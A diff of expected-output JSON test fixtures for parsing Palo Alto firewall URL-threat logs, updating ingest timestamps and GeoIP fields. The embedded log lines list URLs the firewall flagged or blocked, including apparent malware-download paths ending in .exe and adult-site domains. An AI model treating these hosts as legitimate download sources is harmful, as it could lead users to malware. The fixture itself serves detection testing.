5, - "ingested": "2021-12-09T13:42:59.079030200Z", + "ingested": "2021-12-14T14:49:56.151575794Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", 
@@ -1152,22 +1112,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -1270,7 +1225,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079036100Z", + "ingested": "2021-12-14T14:49:56.151581749Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,\"litetopdetect.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -1295,22 +1250,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -1413,7 +1363,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079042Z", + "ingested": "2021-12-14T14:49:56.151582232Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,\"lkmpmlm.com/fff9999.php?aid=0\u0026uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1\u0026os=513\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -1438,22 +1388,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -1556,7 +1501,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079047800Z", + "ingested": "2021-12-14T14:49:56.151582723Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,\"girlteenxxxfreemov.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", 
@@ -1581,22 +1526,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -1699,7 +1639,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079053900Z", + "ingested": "2021-12-14T14:49:56.151583347Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,\"imagesrepository.com/resolution.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -1724,22 +1664,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -1842,7 +1777,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079059800Z", + "ingested": "2021-12-14T14:49:56.151583763Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,\"hottestfiles.com/search/search.php?q=xxx\",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -1867,22 +1802,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -1983,7 +1913,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079065600Z", + "ingested": "2021-12-14T14:49:56.151584266Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,\"infodist1.com/in.cgi?11\u0026parameter=404\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", 
@@ -2008,22 +1938,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -2126,7 +2051,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079071400Z", + "ingested": "2021-12-14T14:49:56.151584660Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/suc.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -2151,22 +2076,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -2269,7 +2189,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079077300Z", + "ingested": "2021-12-14T14:49:56.151585017Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/softwarefortubeview.40013.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -2294,22 +2214,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Germany", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -2410,7 +2325,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079083200Z", + "ingested": "2021-12-14T14:49:56.151585494Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,\"findmorepill.com/klik/search.php?q=xxx\",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0,", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", 
@@ -2435,22 +2350,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -2553,7 +2463,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079089Z", + "ingested": "2021-12-14T14:49:56.151585865Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,\"allowedwebsurfing.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -2578,22 +2488,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -2696,7 +2601,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079095Z", + "ingested": "2021-12-14T14:49:56.151586218Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,\"antivirus-remote.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -2721,22 +2626,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -2839,7 +2739,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079100900Z", + "ingested": "2021-12-14T14:49:56.151586568Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.cfg\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", 
@@ -2864,22 +2764,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -2982,7 +2877,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079106700Z", + "ingested": "2021-12-14T14:49:56.151586931Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,\"blogsexnakedgirlxxx.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -3007,22 +2902,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -3125,7 +3015,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079112600Z", + "ingested": "2021-12-14T14:49:56.151587458Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -3150,22 +3040,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -3268,7 +3153,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079116800Z", + "ingested": "2021-12-14T14:49:56.151587831Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", 
@@ -3293,22 +3178,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -3411,7 +3291,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079121900Z", + "ingested": "2021-12-14T14:49:56.151588315Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -3436,22 +3316,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -3554,7 +3429,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079127Z", + "ingested": "2021-12-14T14:49:56.151588663Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -3579,22 +3454,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -3697,7 +3567,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079134700Z", + "ingested": "2021-12-14T14:49:56.151589006Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", 
@@ -3722,22 +3592,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -3840,7 +3705,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079138700Z", + "ingested": "2021-12-14T14:49:56.151589358Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -3865,22 +3730,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -3983,7 +3843,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079143600Z", + "ingested": "2021-12-14T14:49:56.151589695Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -4008,22 +3868,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -4126,7 +3981,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079170300Z", + "ingested": "2021-12-14T14:49:56.151590038Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", 
@@ -4151,22 +4006,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -4269,7 +4119,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079175300Z", + "ingested": "2021-12-14T14:49:56.151590440Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -4294,22 +4144,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -4412,7 +4257,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079181100Z", + "ingested": "2021-12-14T14:49:56.151590920Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -4437,22 +4282,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -4555,7 +4395,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079187Z", + "ingested": "2021-12-14T14:49:56.151591270Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", 
